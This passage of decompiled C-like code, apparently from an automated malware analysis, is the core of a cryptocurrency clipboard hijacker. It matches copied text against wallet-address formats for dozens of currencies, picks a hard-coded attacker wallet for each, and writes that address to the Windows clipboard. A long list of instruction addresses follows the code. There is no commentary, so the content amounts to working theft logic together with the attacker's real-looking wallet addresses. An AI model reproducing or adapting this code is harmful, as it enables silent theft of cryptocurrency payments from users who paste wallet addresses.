                                                                                                                                                                                                                                                                                    													if(_v8 < 0x3c || _v8 > 0x78) {
                                                                                                                                                                                                                                                                                    														return 0;
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														goto L107;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												if(_v8 < 0x2a || _v8 > 0x30) {
                                                                                                                                                                                                                                                                                    													return 0;
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													goto L107;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											if(_v8 < 0x32 || _v8 > 0x38) {
                                                                                                                                                                                                                                                                                    												return 0;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												goto L107;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										if(_v8 < 0x28 || _v8 > 0x46) {
                                                                                                                                                                                                                                                                                    											return 0;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											goto L107;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									if(_v8 < 0x3c || _v8 > 0x40) {
                                                                                                                                                                                                                                                                                    										return 0;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										goto L107;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if(_v8 < 0x18 || _v8 > 0x32) {
                                                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L107;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v8 < 0x1a || _v8 > 0x26) {
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							if(_v8 != 0x5f) {
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L107;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v8 != 0x2a) {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L107:
                                                                                                                                                                                                                                                                                    					if(StrStrW(_a4, L"bitcoincash:") != 0) {
                                                                                                                                                                                                                                                                                    						_v21 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(StrStrW(_a4, L"ronin:") != 0) {
                                                                                                                                                                                                                                                                                    						_v21 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(StrStrW(_a4, L"nano_") != 0) {
                                                                                                                                                                                                                                                                                    						_v21 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if((_v21 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    						L126:
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x30) {
                                                                                                                                                                                                                                                                                    							_v12 = "0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x54) {
                                                                                                                                                                                                                                                                                    							_v12 = "THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x31) {
                                                                                                                                                                                                                                                                                    							_v12 = "1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x71) {
                                                                                                                                                                                                                                                                                    							_v12 = "qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x58) {
                                                                                                                                                                                                                                                                                    							_v12 = "XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x4c) {
                                                                                                                                                                                                                                                                                    							_v12 = "LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x72) {
                                                                                                                                                                                                                                                                                    							_v12 = "rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x68) {
                                                                                                                                                                                                                                                                                    							_v12 = "hx7b6677c8f7049c2a6e9df0dfd422683c32e67709";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x51) {
                                                                                                                                                                                                                                                                                    							_v12 = "QiAmmfSSTe5fkaSLdp9mV4MDHfz27JBoVU";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x52) {
                                                                                                                                                                                                                                                                                    							_v12 = "RCZdkrikMCWrhBG9gNVmmE9yDcQxSUbqFd";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x4e) {
                                                                                                                                                                                                                                                                                    							_v12 = "NDKNTURHWAMQHNHMOPJML5FKZZPQIRE4IZFSMEU2";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x41) {
                                                                                                                                                                                                                                                                                    							_v12 = "ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x34) {
                                                                                                                                                                                                                                                                                    							_v12 = "48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x53 && (_a4[1] & 0x0000ffff) == 0x50) {
                                                                                                                                                                                                                                                                                    							_v12 = "SP1GK1GES8EXB6E15KQJ0EM169NQQNDZG8A2GDRZQ";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x61 && (_a4[1] & 0x0000ffff) != 0x64) {
                                                                                                                                                                                                                                                                                    							_v12 = "aCguZWA9zwz4Dk9zNyxdM96mzWnjLoxzYQ";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x66 && (_a4[1] & 0x0000ffff) == 0x31) {
                                                                                                                                                                                                                                                                                    							_v12 = "f1urg44xg2ziciji4akbxlkwb5y64msbmb7py5ury";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x6c && (_a4[1] & 0x0000ffff) == 0x73 && (_a4[2] & 0x0000ffff) == 0x6b) {
                                                                                                                                                                                                                                                                                    							_v12 = "lsk5mjenfunkehcwu8mss9qd6emg3nrr78em82hwn";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x7a && (_a4[1] & 0x0000ffff) == 0x69 && (_a4[2] & 0x0000ffff) == 0x6c) {
                                                                                                                                                                                                                                                                                    							_v12 = "zil1zucjet9qmgecmen2lm7n2pevu6pf8hg8vzgrl3";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x65 && (_a4[1] & 0x0000ffff) == 0x72 && (_a4[2] & 0x0000ffff) == 0x64) {
                                                                                                                                                                                                                                                                                    							_v12 = "erd1qvpwuwc2xue69enjtte7z3tekdclx9fc4769mlafc3vjt68hp5pq0s82xw";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x6b && (_a4[1] & 0x0000ffff) == 0x61 && (_a4[2] & 0x0000ffff) == 0x76 && (_a4[3] & 0x0000ffff) == 0x61) {
                                                                                                                                                                                                                                                                                    							_v12 = "kava14z663qgxvaq30dwdqepa6r94mhfnzww87nmz7f";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x69 && (_a4[1] & 0x0000ffff) == 0x6e && (_a4[2] & 0x0000ffff) == 0x6a) {
                                                                                                                                                                                                                                                                                    							_v12 = "inj1s33ycsnpnh70ltzrcwvp7ahcpfwn7x9nnptsym";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x6f && (_a4[1] & 0x0000ffff) == 0x73 && (_a4[2] & 0x0000ffff) == 0x6d && (_a4[3] & 0x0000ffff) == 0x6f) {
                                                                                                                                                                                                                                                                                    							_v12 = "osmo1nhtpu3gqq7d448u320xzkjk3j8f370v4f336xj";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x33) {
                                                                                                                                                                                                                                                                                    							if((_a4[1] & 0x0000ffff) != 0x50) {
                                                                                                                                                                                                                                                                                    								_v12 = "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3";
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = "3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x44) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 0x22) {
                                                                                                                                                                                                                                                                                    								if(_v8 == 0x23) {
                                                                                                                                                                                                                                                                                    									_v12 = "DsjozoLCkxdeec5NNLTPx5zRS23UjUm7C7v";
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = "D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x74) {
                                                                                                                                                                                                                                                                                    							if((_a4[1] & 0x0000ffff) == 0x31 || (_a4[1] & 0x0000ffff) == 0x32) {
                                                                                                                                                                                                                                                                                    								_v12 = "t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn";
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								if((_a4[1] & 0x0000ffff) != 0x65 || (_a4[2] & 0x0000ffff) != 0x72 || (_a4[3] & 0x0000ffff) != 0x72 || (_a4[4] & 0x0000ffff) != 0x61) {
                                                                                                                                                                                                                                                                                    									_v12 = "tz1hG2rJaUJBkmwzMTw5KhzQdyPxqJAmu6k7";
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v12 = "terra1ax9ks6fmneqd997wgkdx35zntxfvswg0an2ym6";
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x62) {
                                                                                                                                                                                                                                                                                    							if(StrStrW(_a4, L"bnb") != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = "bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(StrStrW(_a4, L"band") != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = "band1mgnt2v6n9x7pvfquj4ehguyhjytkjswql0uvhr";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(StrStrW(_a4, L"bc1") != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = "bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(StrStrW(_a4, L"ronin:") != 0) {
                                                                                                                                                                                                                                                                                    							_v12 = "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(StrStrW(_a4, L"bitcoincash:") != 0) {
                                                                                                                                                                                                                                                                                    							_v12 = "bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(StrStrW(_a4, L"cosmos") != 0) {
                                                                                                                                                                                                                                                                                    							_v12 = "cosmos1lc7xvs0tyl3u57vgn4nsw2kldmp84lrw75c9g4";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(StrStrW(_a4, L"addr") != 0) {
                                                                                                                                                                                                                                                                                    							_v12 = "addr1q8m948qxhth60qzhag0d3kck7p0y5gqkvnct4w9zwqljcn0kt2wqdwh057q906s7mrd3duz7fgspve8sh2u2yupl93xsjzumrw";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(StrStrW(_a4, L"nano_") != 0) {
                                                                                                                                                                                                                                                                                    							_v12 = "nano_1m1r95bjgfgtahh3dcxeexuidpr6kr799pfuue4u9xczdkymo8rsaebc4ed4";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x47) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 9) {
                                                                                                                                                                                                                                                                                    								if(_v8 != 0x38) {
                                                                                                                                                                                                                                                                                    									_v12 = "GU5ydEfPFXcUtEPqwcyX6AD7BkDAacHy4N";
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v12 = "GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE";
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = "G35598989";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x45) {
                                                                                                                                                                                                                                                                                    							if(_v8 == 9) {
                                                                                                                                                                                                                                                                                    								_v12 = "E36963824";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v8 == 0x30) {
                                                                                                                                                                                                                                                                                    								_v12 = "EQA0PV0Evgs71IkPc8Ng0SrtM3ZZFK87K6B3SgR28VWP6rWT";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x42) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 9) {
                                                                                                                                                                                                                                                                                    								if((_a4[1] & 0x0000ffff) == 0x36 && (_a4[2] & 0x0000ffff) == 0x32 && (_a4[3] & 0x0000ffff) == 0x71) {
                                                                                                                                                                                                                                                                                    									_v12 = "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA";
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = "B36461211";
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) == 0x55) {
                                                                                                                                                                                                                                                                                    							_v12 = "U33390790";
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v16 = lstrlenA(_v12);
                                                                                                                                                                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = GlobalAlloc(0x2002, _v16 + 1);
                                                                                                                                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    								_v20 = GlobalLock(_v28);
                                                                                                                                                                                                                                                                                    								if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    									memcpy(_v20, _v12, _v16 + 1);
                                                                                                                                                                                                                                                                                    									GlobalUnlock(_v28);
                                                                                                                                                                                                                                                                                    									if(OpenClipboard(0) != 0) {
                                                                                                                                                                                                                                                                                    										EmptyClipboard();
                                                                                                                                                                                                                                                                                    										SetClipboardData(1, _v28);
                                                                                                                                                                                                                                                                                    										CloseClipboard();
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						while(_v32 < _v8) {
                                                                                                                                                                                                                                                                                    							if(( *_a4 & 0x0000ffff) != 0x31 || (_a4[_v32] & 0x0000ffff) != 0x4f && (_a4[_v32] & 0x0000ffff) != 0x49 && (_a4[_v32] & 0x0000ffff) != 0x6c) {
                                                                                                                                                                                                                                                                                    								_t346 = _v32;
                                                                                                                                                                                                                                                                                    								_push(_a4[_t346] & 0x0000ffff);
                                                                                                                                                                                                                                                                                    								L0040ECB8();
                                                                                                                                                                                                                                                                                    								_t567 = _t567 + 4;
                                                                                                                                                                                                                                                                                    								if(_t346 != 0) {
                                                                                                                                                                                                                                                                                    									L125:
                                                                                                                                                                                                                                                                                    									_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t347 = _v32;
                                                                                                                                                                                                                                                                                    								_push(_a4[_t347] & 0x0000ffff);
                                                                                                                                                                                                                                                                                    								L0040ECBE();
                                                                                                                                                                                                                                                                                    								_t567 = _t567 + 4;
                                                                                                                                                                                                                                                                                    								if(_t347 != 0) {
                                                                                                                                                                                                                                                                                    									goto L125;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L126;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x00403486
                                                                                                                                                                                                                                                                                    0x0040348a
                                                                                                                                                                                                                                                                                    0x00403491
                                                                                                                                                                                                                                                                                    0x004034a2
                                                                                                                                                                                                                                                                                    0x004034ae
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403668
                                                                                                                                                                                                                                                                                    0x00403678
                                                                                                                                                                                                                                                                                    0x00403695
                                                                                                                                                                                                                                                                                    0x004036a6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004036ae
                                                                                                                                                                                                                                                                                    0x004036ba
                                                                                                                                                                                                                                                                                    0x004036c3
                                                                                                                                                                                                                                                                                    0x004036e0
                                                                                                                                                                                                                                                                                    0x00403703
                                                                                                                                                                                                                                                                                    0x00403726
                                                                                                                                                                                                                                                                                    0x00403749
                                                                                                                                                                                                                                                                                    0x00403774
                                                                                                                                                                                                                                                                                    0x0040379f
                                                                                                                                                                                                                                                                                    0x004037ca
                                                                                                                                                                                                                                                                                    0x004037ed
                                                                                                                                                                                                                                                                                    0x0040380d
                                                                                                                                                                                                                                                                                    0x00403837
                                                                                                                                                                                                                                                                                    0x00403851
                                                                                                                                                                                                                                                                                    0x0040386c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040386c
                                                                                                                                                                                                                                                                                    0x00403857
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403866
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403866
                                                                                                                                                                                                                                                                                    0x00403857
                                                                                                                                                                                                                                                                                    0x0040383d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403846
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040383f
                                                                                                                                                                                                                                                                                    0x00403813
                                                                                                                                                                                                                                                                                    0x00403815
                                                                                                                                                                                                                                                                                    0x00403815
                                                                                                                                                                                                                                                                                    0x0040381d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040382c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040382c
                                                                                                                                                                                                                                                                                    0x0040381d
                                                                                                                                                                                                                                                                                    0x004037f3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403802
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403802
                                                                                                                                                                                                                                                                                    0x004037f3
                                                                                                                                                                                                                                                                                    0x004037d0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004037df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004037df
                                                                                                                                                                                                                                                                                    0x004037d0
                                                                                                                                                                                                                                                                                    0x004037a5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004037b4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004037b4
                                                                                                                                                                                                                                                                                    0x004037a5
                                                                                                                                                                                                                                                                                    0x0040377a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403789
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403789
                                                                                                                                                                                                                                                                                    0x0040377a
                                                                                                                                                                                                                                                                                    0x0040374f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040375e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040375e
                                                                                                                                                                                                                                                                                    0x0040374f
                                                                                                                                                                                                                                                                                    0x0040372c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040373b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040373b
                                                                                                                                                                                                                                                                                    0x0040372c
                                                                                                                                                                                                                                                                                    0x00403709
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403718
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403718
                                                                                                                                                                                                                                                                                    0x00403709
                                                                                                                                                                                                                                                                                    0x004036e6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004036ee
                                                                                                                                                                                                                                                                                    0x004036c5
                                                                                                                                                                                                                                                                                    0x004036c9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004036cb
                                                                                                                                                                                                                                                                                    0x004036d2
                                                                                                                                                                                                                                                                                    0x004036c3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040367a
                                                                                                                                                                                                                                                                                    0x0040367e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00403680
                                                                                                                                                                                                                                                                                    0x0040387b
                                                                                                                                                                                                                                                                                    0x0040388c
                                                                                                                                                                                                                                                                                    0x0040388e
                                                                                                                                                                                                                                                                                    0x0040388e
                                                                                                                                                                                                                                                                                    0x004038a3
                                                                                                                                                                                                                                                                                    0x004038a5
                                                                                                                                                                                                                                                                                    0x004038a5
                                                                                                                                                                                                                                                                                    0x004038ba
                                                                                                                                                                                                                                                                                    0x004038bc
                                                                                                                                                                                                                                                                                    0x004038bc
                                                                                                                                                                                                                                                                                    0x004038c7
                                                                                                                                                                                                                                                                                    0x00403960
                                                                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                                                                    0x0040396b
                                                                                                                                                                                                                                                                                    0x0040396b
                                                                                                                                                                                                                                                                                    0x0040397b
                                                                                                                                                                                                                                                                                    0x0040397d
                                                                                                                                                                                                                                                                                    0x0040397d
                                                                                                                                                                                                                                                                                    0x0040398d
                                                                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                                                                    0x0040399f
                                                                                                                                                                                                                                                                                    0x004039a1
                                                                                                                                                                                                                                                                                    0x004039a1
                                                                                                                                                                                                                                                                                    0x004039b1
                                                                                                                                                                                                                                                                                    0x004039b3
                                                                                                                                                                                                                                                                                    0x004039b3
                                                                                                                                                                                                                                                                                    0x004039c3
                                                                                                                                                                                                                                                                                    0x004039c5
                                                                                                                                                                                                                                                                                    0x004039c5
                                                                                                                                                                                                                                                                                    0x004039d5
                                                                                                                                                                                                                                                                                    0x004039d7
                                                                                                                                                                                                                                                                                    0x004039d7
                                                                                                                                                                                                                                                                                    0x004039e7
                                                                                                                                                                                                                                                                                    0x004039e9
                                                                                                                                                                                                                                                                                    0x004039e9
                                                                                                                                                                                                                                                                                    0x004039f9
                                                                                                                                                                                                                                                                                    0x004039fb
                                                                                                                                                                                                                                                                                    0x004039fb
                                                                                                                                                                                                                                                                                    0x00403a0b
                                                                                                                                                                                                                                                                                    0x00403a0d
                                                                                                                                                                                                                                                                                    0x00403a0d
                                                                                                                                                                                                                                                                                    0x00403a1d
                                                                                                                                                                                                                                                                                    0x00403a1f
                                                                                                                                                                                                                                                                                    0x00403a1f
                                                                                                                                                                                                                                                                                    0x00403a2f
                                                                                                                                                                                                                                                                                    0x00403a31
                                                                                                                                                                                                                                                                                    0x00403a31
                                                                                                                                                                                                                                                                                    0x00403a41
                                                                                                                                                                                                                                                                                    0x00403a43
                                                                                                                                                                                                                                                                                    0x00403a43
                                                                                                                                                                                                                                                                                    0x00403a53
                                                                                                                                                                                                                                                                                    0x00403a61
                                                                                                                                                                                                                                                                                    0x00403a61
                                                                                                                                                                                                                                                                                    0x00403a71
                                                                                                                                                                                                                                                                                    0x00403a7f
                                                                                                                                                                                                                                                                                    0x00403a7f
                                                                                                                                                                                                                                                                                    0x00403a8f
                                                                                                                                                                                                                                                                                    0x00403a9d
                                                                                                                                                                                                                                                                                    0x00403a9d
                                                                                                                                                                                                                                                                                    0x00403aad
                                                                                                                                                                                                                                                                                    0x00403ac7
                                                                                                                                                                                                                                                                                    0x00403ac7
                                                                                                                                                                                                                                                                                    0x00403ad7
                                                                                                                                                                                                                                                                                    0x00403af1
                                                                                                                                                                                                                                                                                    0x00403af1
                                                                                                                                                                                                                                                                                    0x00403b01
                                                                                                                                                                                                                                                                                    0x00403b1b
                                                                                                                                                                                                                                                                                    0x00403b1b
                                                                                                                                                                                                                                                                                    0x00403b2b
                                                                                                                                                                                                                                                                                    0x00403b51
                                                                                                                                                                                                                                                                                    0x00403b51
                                                                                                                                                                                                                                                                                    0x00403b61
                                                                                                                                                                                                                                                                                    0x00403b7b
                                                                                                                                                                                                                                                                                    0x00403b7b
                                                                                                                                                                                                                                                                                    0x00403b8b
                                                                                                                                                                                                                                                                                    0x00403bb1
                                                                                                                                                                                                                                                                                    0x00403bb1
                                                                                                                                                                                                                                                                                    0x00403bc1
                                                                                                                                                                                                                                                                                    0x00403bcd
                                                                                                                                                                                                                                                                                    0x00403bd8
                                                                                                                                                                                                                                                                                    0x00403bcf
                                                                                                                                                                                                                                                                                    0x00403bcf
                                                                                                                                                                                                                                                                                    0x00403bcf
                                                                                                                                                                                                                                                                                    0x00403bcd
                                                                                                                                                                                                                                                                                    0x00403be8
                                                                                                                                                                                                                                                                                    0x00403bee
                                                                                                                                                                                                                                                                                    0x00403bfd
                                                                                                                                                                                                                                                                                    0x00403bff
                                                                                                                                                                                                                                                                                    0x00403bff
                                                                                                                                                                                                                                                                                    0x00403bf0
                                                                                                                                                                                                                                                                                    0x00403bf0
                                                                                                                                                                                                                                                                                    0x00403bf0
                                                                                                                                                                                                                                                                                    0x00403bee
                                                                                                                                                                                                                                                                                    0x00403c0f
                                                                                                                                                                                                                                                                                    0x00403c1b
                                                                                                                                                                                                                                                                                    0x00403c29
                                                                                                                                                                                                                                                                                    0x00403c32
                                                                                                                                                                                                                                                                                    0x00403c3c
                                                                                                                                                                                                                                                                                    0x00403c6b
                                                                                                                                                                                                                                                                                    0x00403c62
                                                                                                                                                                                                                                                                                    0x00403c62
                                                                                                                                                                                                                                                                                    0x00403c62
                                                                                                                                                                                                                                                                                    0x00403c3c
